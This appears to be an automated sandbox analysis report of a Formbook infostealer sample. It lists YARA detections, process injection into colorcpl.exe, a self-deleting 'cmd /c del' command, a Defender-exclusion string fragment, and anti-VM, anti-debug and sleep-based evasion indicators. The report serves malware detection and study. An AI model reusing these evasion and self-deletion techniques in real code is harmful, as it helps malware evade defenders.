Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: UOMp9cDcqZ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@10/6

Creates files inside the user directory

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UOMp9cDcqZ.exe.log

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01

PE file has an executable .text section and no other executable section

Source: UOMp9cDcqZ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

SQL strings found in memory and binary data

Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Sample is known by Antivirus

Source: UOMp9cDcqZ.exe	Virustotal: Detection: 16%
Source: UOMp9cDcqZ.exe	Metadefender: Detection: 22%
Source: UOMp9cDcqZ.exe	ReversingLabs: Detection: 50%

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'			Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a COM descriptor data directory

Source: UOMp9cDcqZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: UOMp9cDcqZ.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Source: UOMp9cDcqZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: UOMp9cDcqZ.exe
Source:	Binary string: colorcpl.pdbGCTL source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source:	Binary string: colorcpl.pdb source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UOMp9cDcqZ.exe, colorcpl.exe

Data Obfuscation:

.NET source code contains potential unpacker

Source: UOMp9cDcqZ.exe, Aspiring_Rookie/DebuggableAttribute.cs	.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs	.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs	.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.UOMp9cDcqZ.exe.860000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs	.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.UOMp9cDcqZ.exe.860000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs	.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.UOMp9cDcqZ.exe.860000.1.unpack, Aspiring_Rookie/DebuggableAttribute.cs	.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E613656 push cs; ret		1_2_0E61365C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E6112B0 push cs; ret		1_2_0E6112B4
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E6112BA push cs; ret		1_2_0E6112BE
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B2A2 push cs; ret		2_2_0041B2A3
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B3F2 push eax; ret		2_2_0041B3F8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B3FB push eax; ret		2_2_0041B462
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B3A5 push eax; ret		2_2_0041B3F8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B45C push eax; ret		2_2_0041B462
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00415414 push esp; ret		2_2_00415416
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00414F46 push cs; ret		2_2_00414F47
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041BF12 push dword ptr [8427D5C5h]; ret		2_2_0041C1FF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00415FC5 push ebp; ret		2_2_00415FC6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013FD0D1 push ecx; ret		2_2_013FD0E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0474D0D1 push ecx; ret		15_2_0474D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B2A2 push cs; ret		15_2_0255B2A3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B3F2 push eax; ret		15_2_0255B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B3FB push eax; ret		15_2_0255B462
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B3A5 push eax; ret		15_2_0255B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02554F46 push cs; ret		15_2_02554F47
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255BF12 push dword ptr [8427D5C5h]; ret		15_2_0255C1FF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02555FC5 push ebp; ret		15_2_02555FC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B45C push eax; ret		15_2_0255B462
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02555414 push esp; ret		15_2_02555416

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 7.86649805273

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UOMp9cDcqZ.exe PID: 5852, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 00000000025485E4 second address: 00000000025485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 000000000254896E second address: 0000000002548974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Code function: 2_2_004088A0 rdtsc

2_2_004088A0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 5336	Thread sleep time: -99749s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 204	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 3320	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1704	Thread sleep time: -32000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Contains medium sleeps (>= 30s)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Thread delayed: delay time: 99749			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.288826880.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.267541205.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Code function: 2_2_004088A0 rdtsc

2_2_004088A0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Code function: 2_2_00409B10 LdrLoadDll,

2_2_00409B10

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01423540 mov eax, dword ptr fs:[00000030h]		2_2_01423540
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]		2_2_013D4D3B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]		2_2_013D4D3B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]		2_2_013D4D3B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D513A mov eax, dword ptr fs:[00000030h]		2_2_013D513A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D513A mov eax, dword ptr fs:[00000030h]		2_2_013D513A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AAD30 mov eax, dword ptr fs:[00000030h]		2_2_013AAD30
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
